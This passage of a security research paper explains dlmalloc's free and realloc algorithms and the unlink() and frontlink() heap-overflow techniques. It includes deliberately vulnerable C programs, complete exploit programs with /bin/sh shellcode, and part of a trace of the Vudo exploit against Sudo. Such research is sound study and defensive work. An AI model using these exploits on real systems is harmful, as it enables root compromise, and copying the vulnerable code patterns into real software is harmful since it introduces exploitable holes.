+the following cases:
+
+[1] - "free(0) has no effect."
+
+But if the pointer argument passed to free(3) is not equal to NULL (and
+it is usually not), the step[2] is carried out.
+
+[2] - "If the chunk was allocated via mmap, it is released via
+munmap()."
+
+The fREe() function determines (thanks to the macro chunk_is_mmapped()
+presented in 3.3.4) whether the chunk to be freed was allocated via the
+memory mapping mechanism (described in 3.1.2.5) or not, and calls the
+internal function munmap_chunk() (not detailed in the present paper) if
+it was, but calls chunk_free() (step[3] and step[4]) if it was not.
+
+[3] - "If a returned chunk borders the current high end of memory, it is
+consolidated into the top".
+
+If the chunk to be freed is located immediately before the top-most
+available chunk (the wilderness chunk), a new wilderness chunk is
+assembled (but the step[4] is otherwise carried out):
+
+[3.1] -- If the chunk located immediately before the chunk being
+freed is unused, it is taken off its doubly-linked list via unlink()
+and becomes the beginning of the new wilderness chunk (composed of
+the former wilderness chunk, the chunk being freed, and the chunk
+located immediately before). As a side note, unlink() is equivalent to
+clear_last_remainder() if the processed chunk is the `last_remainder'.
+
+[3.2] -- But if that previous chunk is allocated, the chunk being freed
+becomes the beginning of the new wilderness chunk (composed of the
+former wilderness chunk and the chunk being freed).
+
+[4] - "Other chunks are consolidated as they arrive, and placed in
+corresponding bins. (This includes the case of consolidating with the
+current `last_remainder')."
+
+[4.1] -- If the chunk located immediately before the chunk to be freed
+is unused, it is taken off its doubly-linked list via unlink() (if it is
+not the `last_remainder') and consolidated with the chunk being freed.
+
+[4.2] -- If the chunk located immediately after the chunk to be freed is
+unused, it is taken off its doubly-linked list via unlink() (if it is
+not the `last_remainder') and consolidated with the chunk being freed.
+
+[4.3] -- The resulting coalesced chunk is placed in its doubly-linked
+list (via the frontlink() macro), or becomes the new `last_remainder'
+if the old `last_remainder' was consolidated with the chunk being freed
+(but the link_last_remainder() macro is called only if the beginning
+of the new `last_remainder' is different from the beginning of the old
+`last_remainder').
+
+------[ 3.5.3 - The realloc(3) algorithm ]------------------------------
+
+The realloc(3) function, named __libc_realloc() in the GNU C Library
+(realloc() is just a weak symbol) and rEALLOc() in the malloc.c file,
+executes in the first place the code pointed to by __realloc_hook if
+this debugging hook is not equal to NULL (but it normally is), and next
+distinguishes between the following cases:
+
+[1] - "Unless the #define REALLOC_ZERO_BYTES_FREES is set, realloc with
+a size argument of zero (re)allocates a minimum-sized chunk."
+
+But if REALLOC_ZERO_BYTES_FREES is set, and if realloc(3) was called
+with a size argument of zero, the fREe() function (described in 3.5.2)
+is called in order to free the chunk of memory passed to realloc(3). The
+step[2] is otherwise carried out.
+
+[2] - "realloc of null is supposed to be same as malloc".
+
+If realloc(3) was called with a pointer argument of NULL, the mALLOc()
+function (detailed in 3.5.1) is called in order to allocate a new chunk
+of memory. The step[3] is otherwise carried out, but the amount of
+dynamic memory requested by the user is first converted into a usable
+form (via request2size() presented in 3.3.2).
+
+[3] - "Chunks that were obtained via mmap [...]."
+
+rEALLOc() calls the macro chunk_is_mmapped() (presented in 3.3.4) in
+order to determine whether the chunk to be reallocated was obtained via
+the memory mapping mechanism (described in 3.1.2.5) or not. If it was,
+specific code (not detailed in the present paper) is executed, but if
+it was not, the chunk to be reallocated is processed by the internal
+function chunk_realloc() (step[4] and next ones).
+
+[4] - "If the reallocation is for less space [...]."
+
+[4.1] -- The processed chunk is divided into two parts if its size is
+MINSIZE bytes or more greater than the request size: the first part
+(whose size is equal to the request size) is returned to rEALLOc(), and
+the second part is freed via a call to chunk_free() (detailed in 3.5.2).
+
+[4.2] -- But the processed chunk is simply returned to rEALLOc() if the
+difference between its size and the request size is less than MINSIZE
+bytes (this difference is of course greater than or equal to 0 since
+the size of the processed chunk is greater than or equal to the request
+size).
+
+[5] - "Otherwise, if the reallocation is for additional space, and the
+chunk can be extended, it is, else a malloc-copy-free sequence is taken.
+There are several different ways that a chunk could be extended. All are
+tried:"
+
+[5.1] -- "Extending forward into following adjacent free chunk."
+
+If the chunk of memory located immediately after the chunk to be
+reallocated is free, the two following steps are tried before the
+step[5.2] is carried out:
+
+[5.1.1] --- If this free chunk is the top-most available chunk (the
+wilderness chunk) and if its size plus the size of the chunk being
+reallocated is MINSIZE bytes or more greater than the request size,
+the wilderness chunk is divided into two parts. The first part is
+consolidated with the chunk being reallocated and the resulting
+coalesced chunk is returned to rEALLOc() (the size of this coalesced
+chunk is of course equal to the request size), and the second part
+becomes the new wilderness chunk.
+
+[5.1.2] --- But if that free chunk is a normal free chunk, and if its
+size plus the size of the chunk being reallocated is greater than or
+equal to the request size, it is taken off its doubly-linked list via
+unlink() (equivalent to clear_last_remainder() if the processed chunk is
+the `last_remainder') and consolidated with the chunk being freed, and
+the resulting coalesced chunk is then treated as it would have been at
+step[4].
+
+[5.2] -- "Both shifting backwards and extending forward."
+
+If the chunk located immediately before the chunk to be reallocated is
+free, and if the chunk located immediately after is free as well, the
+two following steps are tried before the step[5.3] is carried out:
+
+[5.2.1] --- If the chunk located immediately after the chunk to be
+reallocated is the top-most available chunk (the wilderness chunk)
+and if its size plus the size of the chunk being reallocated plus the
+size of the previous chunk is MINSIZE bytes or more greater than the
+request size, the said three chunks are coalesced. The previous chunk
+is first taken off its doubly-linked list via unlink() (equivalent to
+clear_last_remainder() if the processed chunk is the `last_remainder'),
+the content of the chunk being reallocated is then copied to the newly
+coalesced chunk, and this coalesced chunk is finally divided into two
+parts: the first part is returned to rEALLOc() (the size of this chunk
+is of course equal to the request size), and the second part becomes the
+new wilderness chunk.
+
+[5.2.2] --- If the chunk located immediately after the chunk to be
+reallocated is a normal free chunk, and if its size plus the size of
+the chunk being reallocated plus the size of the previous chunk is
+greater than or equal to the request size, the said three chunks are
+coalesced. The previous and next chunks are first taken off their
+doubly-linked lists via unlink() (equivalent to clear_last_remainder()
+if the processed chunk is the `last_remainder'), the content of the
+chunk being reallocated is then copied to the newly coalesced chunk,
+and this coalesced chunk is finally treated as it would have been at
+step[4].
+
+[5.3] -- "Shifting backwards, joining preceding adjacent space".
+
+If the chunk located immediately before the chunk to be reallocated
+is free and if its size plus the size of the chunk being reallocated
+is greater than or equal to the request size, the said two chunks
+are coalesced (but the step[5.4] is otherwise carried out). The
+previous chunk is first taken off its doubly-linked list via unlink()
+(equivalent to clear_last_remainder() if the processed chunk is the
+`last_remainder'), the content of the chunk being reallocated is then
+copied to the newly coalesced chunk, and this coalesced chunk is finally
+treated as it would have been at step[4].
+
+[5.4] -- If the chunk to be reallocated could not be extended, the
+internal function chunk_alloc() (detailed in 3.5.1) is called in order
+to allocate a new chunk of exactly the request size:
+
+[5.4.1] --- If the chunk returned by chunk_alloc() is located
+immediately after the chunk being reallocated (this can only happen
+when that next chunk was extended during the chunk_alloc() execution
+(since it was not big enough before), so this can only happen when
+this next chunk is the wilderness chunk, extended during the step[6]
+of the malloc(3) algorithm), it is consolidated with the chunk being
+reallocated and the resulting coalesced chunk is then treated as it
+would have been at step[4].
+
+[5.4.2] --- The chunk being reallocated is otherwise freed via
+chunk_free() (detailed in 3.5.2), but its content is first copied to
+the newly allocated chunk returned by chunk_alloc(). Finally, the chunk
+returned by chunk_alloc() is returned to rEALLOc().
+
+----[ 3.6 - Execution of arbitrary code ]-------------------------------
+
+------[ 3.6.1 - The unlink() technique ]--------------------------------
+
+--------[ 3.6.1.1 - Concept ]-------------------------------------------
+
+If an attacker manages to trick dlmalloc into processing a carefully
+crafted fake chunk of memory (or a chunk whose fd and bk fields have
+been corrupted) with the unlink() macro, they will be able to overwrite
+any integer in memory with the value of their choosing, and will
+therefore be able to eventually execute arbitrary code.
+
+#define unlink( P, BK, FD ) {            \
+[1] BK = P->bk;                          \
+[2] FD = P->fd;                          \
+[3] FD->bk = BK;                         \
+[4] BK->fd = FD;                         \
+}
+
+Indeed, the attacker could store the address of a function pointer,
+minus 12 bytes as explained below, in the forward pointer FD of the
+fake chunk (read at line[2]), and the address of a shellcode in the
+back pointer BK of the fake chunk (read at line[1]). The unlink() macro
+would therefore, when trying to take this fake chunk off its imaginary
+doubly-linked list, overwrite (at line[3]) the function pointer located
+at FD plus 12 bytes (12 is the offset of the bk field within a boundary
+tag) with BK (the address of the shellcode).
+
+If the vulnerable program reads the overwritten function pointer (an
+entry of the GOT (Global Offset Table) or one of the debugging hooks
+compiled in Doug Lea's Malloc (__malloc_hook, __free_hook, etc) for
+example) and jumps to the memory location it points to, and if a valid
+shellcode is stored there at that time, the shellcode is executed.
+
+But since unlink() would also overwrite (at line[4]) an integer located
+in the very middle of the shellcode, at BK plus 8 bytes (8 is the offset
+of the fd field within a boundary tag), with FD (a valid pointer but
+probably not valid machine code), the first instruction of the shellcode
+should jump over the overwritten integer, into a classic shellcode.
+
+This unlink() technique, first introduced by Solar Designer, is
+illustrated with a proof of concept in 3.6.1.2, and was successfully
+exploited in the wild against certain vulnerable versions of programs
+like Netscape browsers, traceroute, and slocate (mentioned in 3.1.2.1).
+
+--------[ 3.6.1.2 - Proof of concept ]----------------------------------
+
+The program below contains a typical buffer overflow since an attacker
+can overwrite (at line[3]) the data stored immediately after the end
+of the first buffer if the first argument they passed to the program
+(argv[1]) is larger than 666 bytes:
+
+$ set -o noclobber && cat > vulnerable.c << EOF
+#include <stdlib.h>
+#include <string.h>
+
+int main( int argc, char * argv[] )
+{
+        char * first, * second;
+
+/*[1]*/ first = malloc( 666 );
+/*[2]*/ second = malloc( 12 );
+/*[3]*/ strcpy( first, argv[1] );
+/*[4]*/ free( first );
+/*[5]*/ free( second );
+/*[6]*/ return( 0 );
+}
+EOF
+
+$ make vulnerable
+cc     vulnerable.c   -o vulnerable
+
+$ ./vulnerable `perl -e 'print "B" x 1337'`
+Segmentation fault (core dumped)
+
+Since the first buffer was allocated in the heap (at line[1], or more
+precisely during the step[4] of the malloc(3) algorithm) and not on the
+stack, the attacker cannot use the classic stack smashing techniques and
+simply overwrite a saved instruction pointer or a saved frame pointer in
+order to exploit the vulnerability and execute arbitrary code:
+
+http://www.phrack.org/show.php?p=49&a=14
+http://www.phrack.org/show.php?p=55&a=8
+
+But the attacker could overwrite the boundary tag associated with the
+second chunk of memory (allocated in the heap at line[2], during the
+step[4] of the malloc(3) algorithm), since this boundary tag is located
+immediately after the end of the first chunk. The memory area reserved
+for the user within the first chunk even includes the prev_size field of
+that boundary tag (as detailed in 3.3.3), and the size of this area is
+equal to 668 bytes (indeed, and as calculated in 3.3.1, the size of the
+memory area reserved for the user within the first chunk is equal to the
+effective size of this chunk, 672 (request2size(666)), minus 4 bytes).
+
+So if the size of the first argument passed to the vulnerable program
+by the attacker is greater than or equal to 680 (668 + 3*4) bytes, the
+attacker will be able to overwrite the size, fd and bk fields of the
+boundary tag associated with the second chunk. They could therefore use
+the unlink() technique, but how can dlmalloc be tricked into processing
+the corrupted second chunk with unlink() since this chunk is allocated?
+
+When free(3) is called at line[4] in order to free the first chunk, the
+step[4.2] of the free(3) algorithm is carried out and the second chunk
+is processed by unlink() if it is free (if the PREV_INUSE bit of the
+next contiguous chunk is clear). Unfortunately this bit is set because
+the second chunk is allocated, but the attacker can trick dlmalloc into
+reading a fake PREV_INUSE bit since they control the size field of the
+second chunk (used by dlmalloc in order to compute the address of the
+next contiguous chunk).
+
+For instance, if the attacker overwrites the size field of the second
+chunk with -4 (0xfffffffc), dlmalloc will think the beginning of the
+next contiguous chunk is in fact 4 bytes before the beginning of the
+second chunk, and will therefore read the prev_size field of the second
+chunk instead of the size field of the next contiguous chunk. So if
+the attacker stores an even integer (an integer whose PREV_INUSE bit
+is clear) in this prev_size field, dlmalloc will process the corrupted
+second chunk with unlink() and the attacker will be able to apply the
+technique described in 3.6.1.1.
+
+Indeed, the exploit below overwrites the fd field of the second chunk
+with a pointer to the GOT entry of the free(3) function (read at line[5]
+after the unlink() attack) minus 12 bytes, and overwrites the bk field
+of the second chunk with the address of a special shellcode stored 8
+(2*4) bytes after the beginning of the first buffer (the first 8 bytes
+of this buffer correspond to the fd and bk fields of the associated
+boundary tag and are overwritten at line[4], by frontlink() during the
+step[4.3] of the free(3) algorithm).
+
+Since the shellcode is executed in the heap, this exploit will work
+against systems protected with the Linux kernel patch from the Openwall
+Project, but not against systems protected with the Linux kernel patch
+from the PaX Team:
+
+http://www.openwall.com/linux/
+http://pageexec.virtualave.net/
+
+$ objdump -R vulnerable | grep free
+0804951c R_386_JUMP_SLOT   free
+
+$ ltrace ./vulnerable 2>&1 | grep 666
+malloc(666)                                       = 0x080495e8
+
+$ set -o noclobber && cat > exploit.c << EOF
+#include <string.h>
+#include <unistd.h>
+
+#define FUNCTION_POINTER ( 0x0804951c )
+#define CODE_ADDRESS ( 0x080495e8 + 2*4 )
+
+#define VULNERABLE "./vulnerable"
+#define DUMMY 0xdefaced
+#define PREV_INUSE 0x1
+
+char shellcode[] =
+        /* the jump instruction */
+        "\xeb\x0appssssffff"
+        /* the Aleph One shellcode */
+        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+int main( void )
+{
+        char * p;
+        char argv1[ 680 + 1 ];
+        char * argv[] = { VULNERABLE, argv1, NULL };
+
+        p = argv1;
+        /* the fd field of the first chunk */
+        *( (void **)p ) = (void *)( DUMMY );
+        p += 4;
+        /* the bk field of the first chunk */
+        *( (void **)p ) = (void *)( DUMMY );
+        p += 4;
+        /* the special shellcode */
+        memcpy( p, shellcode, strlen(shellcode) );
+        p += strlen( shellcode );
+        /* the padding */
+        memset( p, 'B', (680 - 4*4) - (2*4 + strlen(shellcode)) );
+        p += ( 680 - 4*4 ) - ( 2*4 + strlen(shellcode) );
+        /* the prev_size field of the second chunk */
+        *( (size_t *)p ) = (size_t)( DUMMY & ~PREV_INUSE );
+        p += 4;
+        /* the size field of the second chunk */
+        *( (size_t *)p ) = (size_t)( -4 );
+        p += 4;
+        /* the fd field of the second chunk */
+        *( (void **)p ) = (void *)( FUNCTION_POINTER - 12 );
+        p += 4;
+        /* the bk field of the second chunk */
+        *( (void **)p ) = (void *)( CODE_ADDRESS );
+        p += 4;
+        /* the terminating NUL character */
+        *p = '\0';
+
+        /* the execution of the vulnerable program */
+        execve( argv[0], argv, NULL );
+        return( -1 );
+}
+EOF
+
+$ make exploit
+cc     exploit.c   -o exploit
+
+$ ./exploit
+bash$
+
+------[ 3.6.2 - The frontlink() technique ]-----------------------------
+
+--------[ 3.6.2.1 - Concept ]-------------------------------------------
+
+Alternatively an attacker can exploit the frontlink() macro in order
+to abuse programs which mistakenly manage the heap. The frontlink()
+technique is less flexible and more difficult to implement than the
+unlink() technique, however it may be an interesting option since its
+preconditions are different. Although no exploit is known to apply this
+frontlink() technique in the wild, a proof of concept is presented in
+3.6.2.2, and it was one of the possible techniques against the Sudo
+vulnerability.
+
+#define frontlink( A, P, S, IDX, BK, FD ) {            \
+    if ( S < MAX_SMALLBIN_SIZE ) {                     \
+        IDX = smallbin_index( S );                     \
+        mark_binblock( A, IDX );                       \
+        BK = bin_at( A, IDX );                         \
+        FD = BK->fd;                                   \
+        P->bk = BK;                                    \
+        P->fd = FD;                                    \
+        FD->bk = BK->fd = P;                           \
+[1] } else {                                           \
+        IDX = bin_index( S );                          \
+        BK = bin_at( A, IDX );                         \
+        FD = BK->fd;                                   \
+        if ( FD == BK ) {                              \
+            mark_binblock(A, IDX);                     \
+        } else {                                       \
+[2]         while ( FD != BK && S < chunksize(FD) ) {  \
+[3]             FD = FD->fd;                           \
+            }                                          \
+[4]         BK = FD->bk;                               \
+        }                                              \
+        P->bk = BK;                                    \
+        P->fd = FD;                                    \
+[5]     FD->bk = BK->fd = P;                           \
+    }                                                  \
+}
+
+If the free chunk P processed by frontlink() is not a small chunk,
+the code at line[1] is executed, and the proper doubly-linked list of
+free chunks is traversed (at line[2]) until the place where P should
+be inserted is found. If the attacker managed to overwrite the forward
+pointer of one of the traversed chunks (read at line[3]) with the
+address of a carefully crafted fake chunk, they could trick frontlink()
+into leaving the loop[2] while FD points to this fake chunk. Next the
+back pointer BK of that fake chunk would be read (at line[4]) and the
+integer located at BK plus 8 bytes (8 is the offset of the fd field
+within a boundary tag) would be overwritten with the address of the
+chunk P (at line[5]).
+
+The attacker could store the address of a function pointer (minus 8
+bytes of course) in the bk field of the fake chunk, and therefore trick
+frontlink() into overwriting (at line[5]) this function pointer with the
+address of the chunk P (but unfortunately not with the address of their
+choosing). Moreover, the attacker should store valid machine code at
+that address since their final purpose is to execute arbitrary code the
+next time the function pointed to by the overwritten integer is called.
+
+But the address of the free chunk P corresponds to the beginning of the
+associated boundary tag, and therefore to the location of its prev_size
+field. So is it really possible to store machine code in prev_size?
+
+- If the heap layout around prev_size evolved between the moment the
+frontlink() attack took place and the moment the function pointed to by
+the overwritten integer is called, the 4 bytes that were corresponding
+to the prev_size field could henceforth correspond to the very middle
+of an allocated chunk controlled by the attacker, and could therefore
+correspond to the beginning of a classic shellcode.
+
+- But if the heap layout did not evolve, the attacker may still store
+valid machine code in the prev_size field of the chunk P. Indeed,
+this prev_size field is not used by dlmalloc and could therefore hold
+user data (as mentioned in 3.3.3), since the chunk of memory located
+immediately before the chunk P is allocated (it would otherwise have
+been consolidated with the free chunk P before the evil frontlink()
+call).
+
+-- If the content and size of this previous chunk are controlled by
+the attacker, they also control the content of the trailing prev_size
+field (the prev_size field of the chunk P). Indeed, if the size argument
+passed to malloc(3) or realloc(3) is a multiple of 8 bytes minus 4 bytes
+(as detailed in 3.3.1), the trailing prev_size field will probably hold
+user data, and the attacker can therefore store a jump instruction
+there. This jump instruction could, once executed, simply branch to
+a classic shellcode located just before the prev_size field. This
+technique is used in 3.6.2.2.
+
+-- But even if the content or size of the chunk located before the chunk
+P is not controlled by the attacker, they might be able to store valid
+machine code in the prev_size field of P. Indeed, if they managed to
+store machine code in the 4 bytes corresponding to this prev_size field
+before the heap layout around prev_size was fixed (the attacker could
+for example allocate a buffer that would cover the prev_size field-to-be
+and store machine code there), and if the content of that prev_size
+field was not destroyed (for example, a call to malloc(3) with a size
+argument of 16 reserves 20 bytes for the caller, and the last 4 bytes
+(the trailing prev_size field) are therefore never overwritten by the
+caller) at the time the function pointed to by the integer overwritten
+during the frontlink() attack is called, the machine code would be
+executed and could simply branch to a classic shellcode.
+
+--------[ 3.6.2.2 - Proof of concept ]----------------------------------
+
+The program below is vulnerable to a buffer overflow: although the
+attacker cannot overflow (at line[7]) the first buffer allocated
+dynamically in the heap (at line[1]) with the content of argv[2] (since
+the size of this first buffer is exactly the size of argv[2]), however
+they can overflow (at line[9]) the fourth buffer allocated dynamically
+in the heap (at line[4]) with the content of argv[1]. The size of the
+memory area reserved for the user within the fourth chunk is equal to
+668 (request2size(666) - 4) bytes (as calculated in 3.6.1.2), so if the
+size of argv[1] is greater than or equal to 676 (668 + 2*4) bytes, the
+attacker can overwrite the size and fd fields of the next contiguous
+boundary tag.
+
+$ set -o noclobber && cat > vulnerable.c << EOF
+#include <stdlib.h>
+#include <string.h>
+
+int main( int argc, char * argv[] )
+{
+        char * first, * second, * third, * fourth, * fifth, * sixth;
+
+/*[1]*/ first = malloc( strlen(argv[2]) + 1 );
+/*[2]*/ second = malloc( 1500 );
+/*[3]*/ third = malloc( 12 );
+/*[4]*/ fourth = malloc( 666 );
+/*[5]*/ fifth = malloc( 1508 );
+/*[6]*/ sixth = malloc( 12 );
+/*[7]*/ strcpy( first, argv[2] );
+/*[8]*/ free( fifth );
+/*[9]*/ strcpy( fourth, argv[1] );
+/*[0]*/ free( second );
+        return( 0 );
+}
+EOF
+
+$ make vulnerable
+cc     vulnerable.c   -o vulnerable
+
+$ ./vulnerable `perl -e 'print "B" x 1337'` dummy
+Segmentation fault (core dumped)
+
+The six buffers used by this program are allocated dynamically (at
+line[1], line[2], line[3], line[4], line[5] and line[6]) during the
+step[4] of the malloc(3) algorithm, and the second buffer is therefore
+located immediately after the first one, the third one after the second
+one, and so on. The attacker can therefore overwrite (at line[9]) the
+boundary tag associated with the fifth chunk (allocated at line[5] and
+freed at line[8]) since this chunk is located immediately after the
+overflowed fourth buffer.
+
+Unfortunately the only call to one of the dlmalloc routines after the
+overflow at line[9] is the call to free(3) at line[0]. In order to free
+the second buffer, the step[4] of the free(3) algorithm is carried out,
+but the unlink() macro is neither called at step[4.1], nor at step[4.2],
+since the chunks of memory that border the second chunk (the first and
+third chunks) are allocated (and the corrupted boundary tag of the fifth
+chunk is not even read during the step[4.1] or step[4.2] of the free(3)
+algorithm). Therefore the attacker cannot exploit the unlink() technique
+during the free(3) call at line[0], but should exploit the frontlink()
+(called at step[4.3] of the free(3) algorithm) technique instead.
+
+Indeed, the fd field of the corrupted boundary tag associated with the
+fifth chunk is read (at line[3] in the frontlink() macro) during this
+call to frontlink(), since the second chunk should be inserted in the
+doubly-linked list of the bin number 79 (as detailed in 3.4.1, because
+the effective size of this chunk is equal to 1504 (request2size(1500))),
+since the fifth chunk was inserted in this very same doubly-linked list
+at line[8] (as detailed in 3.4.1, because the effective size of this
+chunk is equal to 1512 (request2size(1508))), and since the second chunk
+should be inserted after the fifth chunk in that list (1504 is indeed
+less than 1512, and the chunks in each list are maintained in decreasing
+sorted order by size, as mentioned in 3.4.2).
+
+The exploit below overflows the fourth buffer and overwrites the fd
+field of the fifth chunk with the address of a fake chunk stored in the
+environment variables passed to the vulnerable program. The size field
+of this fake chunk is set to 0 in order to trick free(3) into leaving
+the loop[2] of the frontlink() macro while FD points to that fake chunk,
+and in the bk field of the fake chunk is stored the address (minus 8
+bytes) of the first function pointer emplacement in the .dtors section:
+
+http://www.synnergy.net/downloads/papers/dtors.txt
+
+This function pointer, overwritten by frontlink() with the address of
+the second chunk, is read and executed at the end of the vulnerable
+program. Since the attacker can control (via argv[2]) the content and
+size of the chunk located immediately before the second chunk (the first
+chunk), they can use one of the methods described in 3.6.2.1 in order to
+store valid machine code in the prev_size field of the second chunk.
+
+In the exploit below, the size of the second argument passed to the
+vulnerable program (argv[2]) is a multiple of 8 bytes minus 4 bytes,
+and is greater than or equal to the size of the special shellcode used
+by the exploit. The last 4 bytes of this special shellcode (including
+the terminating NUL character) are therefore stored in the last 4
+bytes of the first buffer (the prev_size field of the second chunk)
+and correspond to a jump instruction that simply executes a classic
+shellcode stored right before.
+
+Since the size of argv[2] should be equal to a multiple of 8 bytes minus
+4 bytes, and since this size should also be greater than or equal to
+the size of the special shellcode, the size of argv[2] is simply equal
+to ((((sizeof(shellcode) + 4) + 7) & ~7) - 4), which is equivalent to
+(request2size(sizeof(shellcode)) - 4). The size of the special shellcode
+in the exploit below is equal to 49 bytes, and the size of argv[2] is
+therefore equal to 52 (request2size(49) - 4) bytes.
+
+$ objdump -j .dtors -s vulnerable | grep ffffffff
+ 80495a8 ffffffff 00000000                    ........
+
+$ set -o noclobber && cat > exploit.c << EOF
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define FUNCTION_POINTER ( 0x80495a8 + 4 )
+
+#define VULNERABLE "./vulnerable"
+#define FAKE_CHUNK ( (0xc0000000 - 4) - sizeof(VULNERABLE) - (16 + 1) )
+#define DUMMY 0xeffaced
+
+char shellcode[] =
+        /* the Aleph One shellcode */
+        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        "\x80\xe8\xdc\xff\xff\xff/bin/sh"
+        /* the jump instruction */
+        "\xeb\xd1p";
+
+int main( void )
+{
+        char * p;
+        char argv1[ 676 + 1 ];
+        char argv2[ 52 ];
+        char fake_chunk[ 16 + 1 ];
+        size_t size;
+        char ** envp;
+        char * argv[] = { VULNERABLE, argv1, argv2, NULL };
+
+        p = argv1;
+        /* the padding */
+        memset( p, 'B', 676 - 4 );
+        p += 676 - 4;
+        /* the fd field of the fifth chunk */
+        *( (void **)p ) = (void *)( FAKE_CHUNK );
+        p += 4;
+        /* the terminating NUL character */
+        *p = '\0';
+
+        p = argv2;
+        /* the padding */
+        memset( p, 'B', 52 - sizeof(shellcode) );
+        p += 52 - sizeof(shellcode);
+        /* the special shellcode */
+        memcpy( p, shellcode, sizeof(shellcode) );
+
+        p = fake_chunk;
+        /* the prev_size field of the fake chunk */
+        *( (size_t *)p ) = (size_t)( DUMMY );
+        p += 4;
+        /* the size field of the fake chunk */
+        *( (size_t *)p ) = (size_t)( 0 );
+        p += 4;
+        /* the fd field of the fake chunk */
+        *( (void **)p ) = (void *)( DUMMY );
+        p += 4;
+        /* the bk field of the fake chunk */
+        *( (void **)p ) = (void *)( FUNCTION_POINTER - 8 );
+        p += 4;
+        /* the terminating NUL character */
+        *p = '\0';
+
+        /* the size of the envp array */
+        size = 0;
+        for ( p = fake_chunk; p < fake_chunk + (16 + 1); p++ ) {
+                if ( *p == '\0' ) {
+                        size++;
+                }
+        }
+        size++;
+
+        /* the allocation of the envp array */
+        envp = malloc( size * sizeof(char *) );
+
+        /* the content of the envp array */
+        size = 0;
+        for ( p = fake_chunk; p < fake_chunk + (16+1); p += strlen(p)+1 ) {
+                envp[ size++ ] = p;
+        }
+        envp[ size ] = NULL;
+
+        /* the execution of the vulnerable program */
+        execve( argv[0], argv, envp );
+        return( -1 );
+}
+EOF
+
+$ make exploit
+cc     exploit.c   -o exploit
+
+$ ./exploit
+bash$
+
+
+--[ 4 - Exploiting the Sudo vulnerability ]-----------------------------
+
+----[ 4.1 - The theory ]------------------------------------------------
+
+In order to exploit the Sudo vulnerability, and as mentioned in 2.4, an
+attacker should overwrite a byte of the boundary tag located immediately
+after the end of the msg buffer, and should take advantage of this
+erroneously overwritten byte before it is restored.
+
+Indeed, the exploit provided in 4.2 tricks do_syslog() into overwriting
+(at line[5] in do_syslog()) a byte of the bk pointer associated with
+this next contiguous boundary tag, tricks malloc(3) into following (at
+step[3] in malloc(3)) this corrupted back pointer to a fake chunk of
+memory, and tricks malloc(3) into taking (at step[3.2] in malloc(3))
+this fake chunk off its imaginary doubly linked-list. The attacker can
+therefore apply the unlink() technique presented in 3.6.1 and eventually
+execute arbitrary code as root.
+
+How these successive tricks are actually accomplished is presented below
+via a complete, successful, and commented run of the Vudo exploit (the
+dlmalloc calls traced below were performed by Sudo, and were obtained
+via a special shared library stored in /etc/ld.so.preload):
+
+$ ./vudo 0x002531dc 62595 6866
+malloc( 9 ): 0x0805e480;
+malloc( 7 ): 0x0805e490;
+malloc( 6 ): 0x0805e4a0;
+malloc( 5 ): 0x0805e4b0;
+malloc( 36 ): 0x0805e4c0;
+malloc( 18 ): 0x0805e4e8;
+malloc( 14 ): 0x0805e500;
+malloc( 10 ): 0x0805e518;
+malloc( 5 ): 0x0805e528;
+malloc( 19 ): 0x0805e538;
+malloc( 3 ): 0x0805e550;
+malloc( 62596 ): 0x0805e560;
+
+This 62596 bytes buffer was allocated by the tzset(3) function (called
+by Sudo at the beginning of the init_vars() function) and is a simple
+copy of the TZ environment variable, whose size was provided by the
+attacker via the second argument passed to the Vudo exploit (62596 is
+indeed equal to 62595 plus 1, the size of a terminating NUL character).
+
+The usefulness of such a huge dynamically allocated buffer is detailed
+later on, but proved to be essential to the Vudo exploit. For example,
+this exploit will never work against the Debian operating system since
+the tzset(3) function used by Debian does not read the value of the TZ
+environment variable when a SUID or SGID program is run.
+
+malloc( 176 ): 0x0806d9e8;
+free( 0x0806d9e8 );
+malloc( 17 ): 0x0806d9e8;
+malloc( 6 ): 0x0806da00;
+malloc( 4096 ): 0x0806da10;
+malloc( 6 ): 0x0806ea18;
+malloc( 1024 ): 0x0806ea28;
+malloc( 176 ): 0x0806ee30;
+malloc( 8 ): 0x0806eee8;
+malloc( 120 ): 0x0806eef8;
+malloc( 15 ): 0x0806ef78;
+malloc( 38 ): 0x0806ef90;
+malloc( 40 ): 0x0806efc0;
+malloc( 36 ): 0x0806eff0;
+malloc( 15 ): 0x0806f018;
+malloc( 38 ): 0x0806f030;
+malloc( 40 ): 0x0806f060;
+malloc( 36 ): 0x0806f090;
+malloc( 14 ): 0x0806f0b8;
+malloc( 38 ): 0x0806f0d0;
+malloc( 40 ): 0x0806f100;
+malloc( 36 ): 0x0806f130;
+malloc( 14 ): 0x0806f158;
+malloc( 38 ): 0x0806f170;
+malloc( 40 ): 0x0806f1a0;
+malloc( 36 ): 0x0806f1d0;
+malloc( 36 ): 0x0806f1f8;
+malloc( 19 ): 0x0806f220;
+malloc( 40 ): 0x0806f238;
+malloc( 38 ): 0x0806f268;
+malloc( 15 ): 0x0806f298;
+malloc( 38 ): 0x0806f2b0;
+malloc( 17 ): 0x0806f2e0;
+malloc( 38 ): 0x0806f2f8;
+malloc( 17 ): 0x0806f328;
+malloc( 38 ): 0x0806f340;
+malloc( 18 ): 0x0806f370;
+malloc( 38 ): 0x0806f388;
+malloc( 12 ): 0x0806f3b8;
+malloc( 38 ): 0x0806f3c8;
+malloc( 17 ): 0x0806f3f8;
+malloc( 38 ): 0x0806f410;
+malloc( 17 ): 0x0806f440;
+malloc( 40 ): 0x0806f458;
+malloc( 18 ): 0x0806f488;
+malloc( 40 ): 0x0806f4a0;
+malloc( 18 ): 0x0806f4d0;
+malloc( 38 ): 0x0806f4e8;
+malloc( 40 ): 0x0806f518;
+malloc( 16 ): 0x0806f548;
+malloc( 38 ): 0x0806f560;
+malloc( 40 ): 0x0806f590;
+free( 0x0806eef8 );
+free( 0x0806ee30 );
+malloc( 16 ): 0x0806eef8;
+malloc( 8 ): 0x0806ef10;
+malloc( 12 ): 0x0806ef20;
+malloc( 23 ): 0x0806ef30;
+calloc( 556, 1 ): 0x0806f5c0;
+malloc( 26 ): 0x0806ef50;
